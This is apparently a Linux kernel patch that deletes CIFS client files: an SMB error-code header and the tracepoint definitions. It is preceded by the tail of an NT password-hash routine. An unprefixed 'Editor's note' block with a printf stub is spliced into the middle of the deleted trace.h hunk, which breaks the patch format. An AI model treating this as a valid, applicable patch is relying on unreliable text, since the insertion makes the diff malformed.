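	for (i = 0; i < len; i++) {
		wpwd[2 * i] = (uint8_t)passwd[i];	/* UTF-16LE low byte */
		wpwd[2 * i + 1] = 0;	/* high byte is 0 for ASCII */
	}
	md4(p16, wpwd, len * 2);
	memset(wpwd, 0, sizeof(wpwd));	/* scrub the cleartext copy */
}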
+diff --git a/fs/cifs/smberr.h b/fs/cifs/smberr.h
+deleted file mode 100644
+index aeffdad829e2e..0000000000000
+--- a/fs/cifs/smberr.h
++++ /dev/null
+@@ -1,171 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2004
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   See Error Codes section of the SNIA CIFS Specification
+- *   for more information
+- *
+- */
+-
+-#define SUCCESS	0x00	/* The request was successful. */
+-#define ERRDOS	0x01	/* Error is from the core DOS operating system set */
+-#define ERRSRV	0x02	/* Error is generated by the file server daemon */
+-#define ERRHRD	0x03	/* Error is a hardware error. */
+-#define ERRCMD	0xFF	/* Command was not in the "SMB" format. */
+-
+-/* The following error codes may be generated with the SUCCESS error class.*/
+-
+-/*#define SUCCESS	0	The request was successful. */
+-
+-/* The following error codes may be generated with the ERRDOS error class.*/
+-
+-#define ERRbadfunc		1	/* Invalid function. The server did not
+-					   recognize or could not perform a
+-					   system call generated by the server,
+-					   e.g., set the DIRECTORY attribute on
+-					   a data file, invalid seek mode. */
+-#define ERRbadfile		2	/* File not found. The last component
+-					   of a file's pathname could not be
+-					   found. */
+-#define ERRbadpath		3	/* Directory invalid. A directory
+-					   component in a pathname could not be
+-					   found. */
+-#define ERRnofids		4	/* Too many open files. The server has
+-					   no file handles available. */
+-#define ERRnoaccess		5	/* Access denied, the client's context
+-					   does not permit the requested
+-					   function. This includes the
+-					   following conditions: invalid rename
+-					   command, write to Fid open for read
+-					   only, read on Fid open for write
+-					   only, attempt to delete a non-empty
+-					   directory */
+-#define ERRbadfid		6	/* Invalid file handle. The file handle
+-					   specified was not recognized by the
+-					   server. */
+-#define ERRbadmcb		7	/* Memory control blocks destroyed. */
+-#define ERRnomem		8	/* Insufficient server memory to
+-					   perform the requested function. */
+-#define ERRbadmem		9	/* Invalid memory block address. */
+-#define ERRbadenv		10	/* Invalid environment. */
+-#define ERRbadformat		11	/* Invalid format. */
+-#define ERRbadaccess		12	/* Invalid open mode. */
+-#define ERRbaddata		13	/* Invalid data (generated only by
+-					   IOCTL calls within the server). */
+-#define ERRbaddrive		15	/* Invalid drive specified. */
+-#define ERRremcd		16	/* A Delete Directory request attempted
+-					   to remove the server's current
+-					   directory. */
+-#define ERRdiffdevice		17	/* Not same device (e.g., a cross
+-					   volume rename was attempted) */
+-#define ERRnofiles		18	/* A File Search command can find no
+-					   more files matching the specified
+-					   criteria. */
+-#define ERRwriteprot		19	/* media is write protected */
+-#define ERRgeneral		31
+-#define ERRbadshare		32	/* The sharing mode specified for an
+-					   Open conflicts with existing FIDs on
+-					   the file. */
+-#define ERRlock			33	/* A Lock request conflicted with an
+-					   existing lock or specified an
+-					   invalid mode, or an Unlock request
+-					   attempted to remove a lock held by
+-					   another process. */
+-#define ERRunsup		50
+-#define ERRnosuchshare		67
+-#define ERRfilexists		80	/* The file named in the request
+-					   already exists. */
+-#define ERRinvparm		87
+-#define ERRdiskfull		112
+-#define ERRinvname		123
+-#define ERRinvlevel		124
+-#define ERRdirnotempty		145
+-#define ERRnotlocked		158
+-#define ERRcancelviolation	173
+-#define ERRalreadyexists	183
+-#define ERRbadpipe		230
+-#define ERRpipebusy		231
+-#define ERRpipeclosing		232
+-#define ERRnotconnected		233
+-#define ERRmoredata		234
+-#define ERReasnotsupported	282
+-#define ErrQuota		0x200	/* The operation would cause a quota
+-					   limit to be exceeded. */
+-#define ErrNotALink		0x201	/* A link operation was performed on a
+-					   pathname that was not a link. */
+-
+-/* Below errors are used internally (do not come over the wire) for passthrough
+-   from STATUS codes to POSIX only  */
+-#define ERRsymlink              0xFFFD
+-#define ErrTooManyLinks         0xFFFE
+-
+-/* Following error codes may be generated with the ERRSRV error class.*/
+-
+-#define ERRerror		1	/* Non-specific error code. It is
+-					   returned under the following
+-					   conditions: resource other than disk
+-					   space exhausted (e.g. TIDs), first
+-					   SMB command was not negotiate,
+-					   multiple negotiates attempted, and
+-					   internal server error. */
+-#define ERRbadpw		2	/* Bad password - name/password pair in
+-					   a TreeConnect or Session Setup are
+-					   invalid. */
+-#define ERRbadtype		3	/* used for indicating DFS referral
+-					   needed */
+-#define ERRaccess		4	/* The client does not have the
+-					   necessary access rights within the
+-					   specified context for requested
+-					   function. */
+-#define ERRinvtid		5	/* The Tid specified in a command was
+-					   invalid. */
+-#define ERRinvnetname		6	/* Invalid network name in tree
+-					   connect. */
+-#define ERRinvdevice		7	/* Invalid device - printer request
+-					   made to non-printer connection or
+-					   non-printer request made to printer
+-					   connection. */
+-#define ERRqfull		49	/* Print queue full (files) -- returned
+-					   by open print file. */
+-#define ERRqtoobig		50	/* Print queue full -- no space. */
+-#define ERRqeof			51	/* EOF on print queue dump */
+-#define ERRinvpfid		52	/* Invalid print file FID. */
+-#define ERRsmbcmd		64	/* The server did not recognize the
+-					   command received. */
+-#define ERRsrverror		65	/* The server encountered an internal
+-					   error, e.g., system file
+-					   unavailable. */
+-#define ERRbadBID		66	/* (obsolete) */
+-#define ERRfilespecs		67	/* The Fid and pathname parameters
+-					   contained an invalid combination of
+-					   values. */
+-#define ERRbadLink		68	/* (obsolete) */
+-#define ERRbadpermits		69	/* The access permissions specified for
+-					   a file or directory are not a valid
+-					   combination. */
+-#define ERRbadPID		70
+-#define ERRsetattrmode		71	/* attribute (mode) is invalid */
+-#define ERRpaused		81	/* Server is paused */
+-#define ERRmsgoff		82	/* reserved - messaging off */
+-#define ERRnoroom		83	/* reserved - no room for message */
+-#define ERRrmuns		87	/* reserved - too many remote names */
+-#define ERRtimeout		88	/* operation timed out */
+-#define ERRnoresource		89	/* No resources available for request
+-					   */
+-#define ERRtoomanyuids		90	/* Too many UIDs active on this session
+-					   */
+-#define ERRbaduid		91	/* The UID is not known as a valid user
+-					   */
+-#define ERRusempx		250	/* temporarily unable to use raw */
+-#define ERRusestd		251	/* temporarily unable to use either raw
+-					   or mpx */
+-#define ERR_NOTIFY_ENUM_DIR	1024
+-#define ERRnoSuchUser		2238	/* user account does not exist */
+-#define ERRaccountexpired	2239
+-#define ERRbadclient		2240	/* can not logon from this client */
+-#define ERRbadLogonTime		2241	/* logon hours do not allow this */
+-#define ERRpasswordExpired	2242
+-#define ERRnetlogonNotStarted	2455
+-#define ERRnosupport		0xFFFF
+diff --git a/fs/cifs/trace.c b/fs/cifs/trace.c
+deleted file mode 100644
+index 4654837871934..0000000000000
+--- a/fs/cifs/trace.c
++++ /dev/null
+@@ -1,8 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *   Copyright (C) 2018, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- */
+-#define CREATE_TRACE_POINTS
+-#include "trace.h"
+diff --git a/fs/cifs/trace.h b/fs/cifs/trace.h
+deleted file mode 100644
+index d3053bd8ae731..0000000000000
+--- a/fs/cifs/trace.h
++++ /dev/null
+@@ -1,1070 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- *   Copyright (C) 2018, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- */
+-#undef TRACE_SYSTEM
+-#define TRACE_SYSTEM cifs
+-
+-#if !defined(_CIFS_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
+-#define _CIFS_TRACE_H
+-
+-#include <linux/tracepoint.h>
+-#include <linux/net.h>
+-#include <linux/inet.h>
+-
+-/*
+- * Please use this 3-part article as a reference for writing new tracepoints:
+- * https://lwn.net/Articles/379903/
+- */
+-
+-/* For logging errors in read or write */
+-DECLARE_EVENT_CLASS(smb3_rw_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	offset,
+-		__u32	len,
+-		int	rc),
+-	TP_ARGS(xid, fid, tid, sesid, offset, len, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, offset)
+-		__field(__u32, len)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->offset = offset;
+-		__entry->len = len;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->offset, __entry->len, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_RW_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_rw_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	offset,			\
+-		__u32	len,			\
+-		int	rc),			\
+-	TP_ARGS(xid, fid, tid, sesid, offset, len, rc))
+-
+-DEFINE_SMB3_RW_ERR_EVENT(write_err);
+-DEFINE_SMB3_RW_ERR_EVENT(read_err);
+-DEFINE_SMB3_RW_ERR_EVENT(query_dir_err);
+-DEFINE_SMB3_RW_ERR_EVENT(zero_err);
+-DEFINE_SMB3_RW_ERR_EVENT(falloc_err);
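/*
 * Editor's note: each DEFINE_EVENT above generates a callable named
 * trace_smb3_<name>() with the class prototype, so an error path logs
 * with one call. A self-contained illustration; the stub stands in for
 * the generated tracepoint and only mimics its TP_printk format:
 */
#include <stdio.h>

static void trace_smb3_write_err(unsigned int xid, unsigned long long fid,
				 unsigned int tid, unsigned long long sesid,
				 unsigned long long offset, unsigned int len,
				 int rc)
{
	printf("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x rc=%d\n",
	       xid, sesid, tid, fid, offset, len, rc);
}

static void example_write_error_path(void)
{
	/* placeholder values, logged exactly like smb3_write_err */
	trace_smb3_write_err(1, 0x10ull, 0x2u, 0x30ull, 0x0ull, 4096u, -5);
}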
+-
+-
+-/* For logging successful read or write */
+-DECLARE_EVENT_CLASS(smb3_rw_done_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	offset,
+-		__u32	len),
+-	TP_ARGS(xid, fid, tid, sesid, offset, len),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, offset)
+-		__field(__u32, len)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->offset = offset;
+-		__entry->len = len;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx len=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->offset, __entry->len)
+-)
+-
+-#define DEFINE_SMB3_RW_DONE_EVENT(name)         \
+-DEFINE_EVENT(smb3_rw_done_class, smb3_##name,   \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	offset,			\
+-		__u32	len),			\
+-	TP_ARGS(xid, fid, tid, sesid, offset, len))
+-
+-DEFINE_SMB3_RW_DONE_EVENT(write_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(read_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(query_dir_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(zero_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(falloc_enter);
+-DEFINE_SMB3_RW_DONE_EVENT(write_done);
+-DEFINE_SMB3_RW_DONE_EVENT(read_done);
+-DEFINE_SMB3_RW_DONE_EVENT(query_dir_done);
+-DEFINE_SMB3_RW_DONE_EVENT(zero_done);
+-DEFINE_SMB3_RW_DONE_EVENT(falloc_done);
+-
+-/* For logging successful set EOF (truncate) */
+-DECLARE_EVENT_CLASS(smb3_eof_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u64	offset),
+-	TP_ARGS(xid, fid, tid, sesid, offset),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u64, offset)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->offset = offset;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx offset=0x%llx",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->offset)
+-)
+-
+-#define DEFINE_SMB3_EOF_EVENT(name)         \
+-DEFINE_EVENT(smb3_eof_class, smb3_##name,   \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u64	offset),		\
+-	TP_ARGS(xid, fid, tid, sesid, offset))
+-
+-DEFINE_SMB3_EOF_EVENT(set_eof);
+-
+-/*
+- * For handle based calls other than read and write, and get/set info
+- */
+-DECLARE_EVENT_CLASS(smb3_fd_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid),
+-	TP_ARGS(xid, fid, tid, sesid),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-	),
+-	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid)
+-)
+-
+-#define DEFINE_SMB3_FD_EVENT(name)          \
+-DEFINE_EVENT(smb3_fd_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid),			\
+-	TP_ARGS(xid, fid, tid, sesid))
+-
+-DEFINE_SMB3_FD_EVENT(flush_enter);
+-DEFINE_SMB3_FD_EVENT(flush_done);
+-DEFINE_SMB3_FD_EVENT(close_enter);
+-DEFINE_SMB3_FD_EVENT(close_done);
+-DEFINE_SMB3_FD_EVENT(oplock_not_found);
+-
+-DECLARE_EVENT_CLASS(smb3_fd_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		int	rc),
+-	TP_ARGS(xid, fid, tid, sesid, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\txid=%u sid=0x%llx tid=0x%x fid=0x%llx rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->rc)
+-)
+-
+-#define DEFINE_SMB3_FD_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_fd_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		int	rc),			\
+-	TP_ARGS(xid, fid, tid, sesid, rc))
+-
+-DEFINE_SMB3_FD_ERR_EVENT(flush_err);
+-DEFINE_SMB3_FD_ERR_EVENT(lock_err);
+-DEFINE_SMB3_FD_ERR_EVENT(close_err);
+-
+-/*
+- * For handle based query/set info calls
+- */
+-DECLARE_EVENT_CLASS(smb3_inf_enter_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u8	infclass,
+-		__u32	type),
+-	TP_ARGS(xid, fid, tid, sesid, infclass, type),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u8, infclass)
+-		__field(__u32, type)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->infclass = infclass;
+-		__entry->type = type;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx class=%u type=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->infclass, __entry->type)
+-)
+-
+-#define DEFINE_SMB3_INF_ENTER_EVENT(name)          \
+-DEFINE_EVENT(smb3_inf_enter_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u8	infclass,		\
+-		__u32	type),			\
+-	TP_ARGS(xid, fid, tid, sesid, infclass, type))
+-
+-DEFINE_SMB3_INF_ENTER_EVENT(query_info_enter);
+-DEFINE_SMB3_INF_ENTER_EVENT(query_info_done);
+-DEFINE_SMB3_INF_ENTER_EVENT(notify_enter);
+-DEFINE_SMB3_INF_ENTER_EVENT(notify_done);
+-
+-DECLARE_EVENT_CLASS(smb3_inf_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u64	fid,
+-		__u32	tid,
+-		__u64	sesid,
+-		__u8	infclass,
+-		__u32	type,
+-		int	rc),
+-	TP_ARGS(xid, fid, tid, sesid, infclass, type, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u64, fid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u8, infclass)
+-		__field(__u32, type)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->fid = fid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->infclass = infclass;
+-		__entry->type = type;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x fid=0x%llx class=%u type=0x%x rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid, __entry->fid,
+-		__entry->infclass, __entry->type, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_INF_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_inf_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u64	fid,			\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		__u8	infclass,		\
+-		__u32	type,			\
+-		int	rc),			\
+-	TP_ARGS(xid, fid, tid, sesid, infclass, type, rc))
+-
+-DEFINE_SMB3_INF_ERR_EVENT(query_info_err);
+-DEFINE_SMB3_INF_ERR_EVENT(set_info_err);
+-DEFINE_SMB3_INF_ERR_EVENT(notify_err);
+-DEFINE_SMB3_INF_ERR_EVENT(fsctl_err);
+-
+-DECLARE_EVENT_CLASS(smb3_inf_compound_enter_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		const char *full_path),
+-	TP_ARGS(xid, tid, sesid, full_path),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__string(path, full_path)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__assign_str(path, full_path);
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x path=%s",
+-		__entry->xid, __entry->sesid, __entry->tid,
+-		__get_str(path))
+-)
+-
+-#define DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(name)     \
+-DEFINE_EVENT(smb3_inf_compound_enter_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		const char *full_path),		\
+-	TP_ARGS(xid, tid, sesid, full_path))
+-
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(query_info_compound_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(posix_query_info_compound_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(hardlink_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(rename_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(rmdir_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(set_eof_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(set_info_compound_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(delete_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(mkdir_enter);
+-DEFINE_SMB3_INF_COMPOUND_ENTER_EVENT(tdis_enter);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_inf_compound_done_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid),
+-	TP_ARGS(xid, tid, sesid),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x",
+-		__entry->xid, __entry->sesid, __entry->tid)
+-)
+-
+-#define DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(name)     \
+-DEFINE_EVENT(smb3_inf_compound_done_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid),			\
+-	TP_ARGS(xid, tid, sesid))
+-
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(query_info_compound_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(posix_query_info_compound_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(hardlink_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(rename_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(rmdir_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(set_eof_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(set_info_compound_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(delete_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(mkdir_done);
+-DEFINE_SMB3_INF_COMPOUND_DONE_EVENT(tdis_done);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_inf_compound_err_class,
+-	TP_PROTO(unsigned int xid,
+-		__u32	tid,
+-		__u64	sesid,
+-		int	rc),
+-	TP_ARGS(xid, tid, sesid, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("xid=%u sid=0x%llx tid=0x%x rc=%d",
+-		__entry->xid, __entry->sesid, __entry->tid,
+-		__entry->rc)
+-)
+-
+-#define DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(name)     \
+-DEFINE_EVENT(smb3_inf_compound_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		__u32	tid,			\
+-		__u64	sesid,			\
+-		int rc),			\
+-	TP_ARGS(xid, tid, sesid, rc))
+-
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(query_info_compound_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(posix_query_info_compound_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(hardlink_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(rename_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(rmdir_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(set_eof_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(set_info_compound_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(mkdir_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(delete_err);
+-DEFINE_SMB3_INF_COMPOUND_ERR_EVENT(tdis_err);
+-
+-/*
+- * For logging SMB3 Status code and Command for responses which return errors
+- */
+-DECLARE_EVENT_CLASS(smb3_cmd_err_class,
+-	TP_PROTO(__u32	tid,
+-		__u64	sesid,
+-		__u16	cmd,
+-		__u64	mid,
+-		__u32	status,
+-		int	rc),
+-	TP_ARGS(tid, sesid, cmd, mid, status, rc),
+-	TP_STRUCT__entry(
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u16, cmd)
+-		__field(__u64, mid)
+-		__field(__u32, status)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->cmd = cmd;
+-		__entry->mid = mid;
+-		__entry->status = status;
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\tsid=0x%llx tid=0x%x cmd=%u mid=%llu status=0x%x rc=%d",
+-		__entry->sesid, __entry->tid, __entry->cmd, __entry->mid,
+-		__entry->status, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_CMD_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_cmd_err_class, smb3_##name,    \
+-	TP_PROTO(__u32	tid,			\
+-		__u64	sesid,			\
+-		__u16	cmd,			\
+-		__u64	mid,			\
+-		__u32	status,			\
+-		int	rc),			\
+-	TP_ARGS(tid, sesid, cmd, mid, status, rc))
+-
+-DEFINE_SMB3_CMD_ERR_EVENT(cmd_err);
+-
+-DECLARE_EVENT_CLASS(smb3_cmd_done_class,
+-	TP_PROTO(__u32	tid,
+-		__u64	sesid,
+-		__u16	cmd,
+-		__u64	mid),
+-	TP_ARGS(tid, sesid, cmd, mid),
+-	TP_STRUCT__entry(
+-		__field(__u32, tid)
+-		__field(__u64, sesid)
+-		__field(__u16, cmd)
+-		__field(__u64, mid)
+-	),
+-	TP_fast_assign(
+-		__entry->tid = tid;
+-		__entry->sesid = sesid;
+-		__entry->cmd = cmd;
+-		__entry->mid = mid;
+-	),
+-	TP_printk("\tsid=0x%llx tid=0x%x cmd=%u mid=%llu",
+-		__entry->sesid, __entry->tid,
+-		__entry->cmd, __entry->mid)
+-)
+-
+-#define DEFINE_SMB3_CMD_DONE_EVENT(name)          \
+-DEFINE_EVENT(smb3_cmd_done_class, smb3_##name,    \
+-	TP_PROTO(__u32	tid,			\
+-		__u64	sesid,			\
+-		__u16	cmd,			\
+-		__u64	mid),			\
+-	TP_ARGS(tid, sesid, cmd, mid))
+-
+-DEFINE_SMB3_CMD_DONE_EVENT(cmd_enter);
+-DEFINE_SMB3_CMD_DONE_EVENT(cmd_done);
+-DEFINE_SMB3_CMD_DONE_EVENT(ses_expired);
+-
+-DECLARE_EVENT_CLASS(smb3_mid_class,
+-	TP_PROTO(__u16	cmd,
+-		__u64	mid,
+-		__u32	pid,
+-		unsigned long when_sent,
+-		unsigned long when_received),
+-	TP_ARGS(cmd, mid, pid, when_sent, when_received),
+-	TP_STRUCT__entry(
+-		__field(__u16, cmd)
+-		__field(__u64, mid)
+-		__field(__u32, pid)
+-		__field(unsigned long, when_sent)
+-		__field(unsigned long, when_received)
+-	),
+-	TP_fast_assign(
+-		__entry->cmd = cmd;
+-		__entry->mid = mid;
+-		__entry->pid = pid;
+-		__entry->when_sent = when_sent;
+-		__entry->when_received = when_received;
+-	),
+-	TP_printk("\tcmd=%u mid=%llu pid=%u, when_sent=%lu when_rcv=%lu",
+-		__entry->cmd, __entry->mid, __entry->pid, __entry->when_sent,
+-		__entry->when_received)
+-)
+-
+-#define DEFINE_SMB3_MID_EVENT(name)          \
+-DEFINE_EVENT(smb3_mid_class, smb3_##name,    \
+-	TP_PROTO(__u16	cmd,			\
+-		__u64	mid,			\
+-		__u32	pid,			\
+-		unsigned long when_sent,	\
+-		unsigned long when_received),	\
+-	TP_ARGS(cmd, mid, pid, when_sent, when_received))
+-
+-DEFINE_SMB3_MID_EVENT(slow_rsp);
+-
+-DECLARE_EVENT_CLASS(smb3_exit_err_class,
+-	TP_PROTO(unsigned int xid,
+-		const char *func_name,
+-		int	rc),
+-	TP_ARGS(xid, func_name, rc),
+-	TP_STRUCT__entry(
+-		__field(unsigned int, xid)
+-		__string(func_name, func_name)
+-		__field(int, rc)
+-	),
+-	TP_fast_assign(
+-		__entry->xid = xid;
+-		__assign_str(func_name, func_name);
+-		__entry->rc = rc;
+-	),
+-	TP_printk("\t%s: xid=%u rc=%d",
+-		__get_str(func_name), __entry->xid, __entry->rc)
+-)
+-
+-#define DEFINE_SMB3_EXIT_ERR_EVENT(name)          \
+-DEFINE_EVENT(smb3_exit_err_class, smb3_##name,    \
+-	TP_PROTO(unsigned int xid,		\
+-		const char *func_name,		\
+-		int	rc),			\
+-	TP_ARGS(xid, func_name, rc))
+-
+-DEFINE_SMB3_EXIT_ERR_EVENT(exit_err);
+-
+-
+-DECLARE_EVENT_CLASS(smb3_sync_err_class,
+-	TP_PROTO(unsigned long ino,
+-		int	rc),
+-	TP_ARGS(ino, rc),
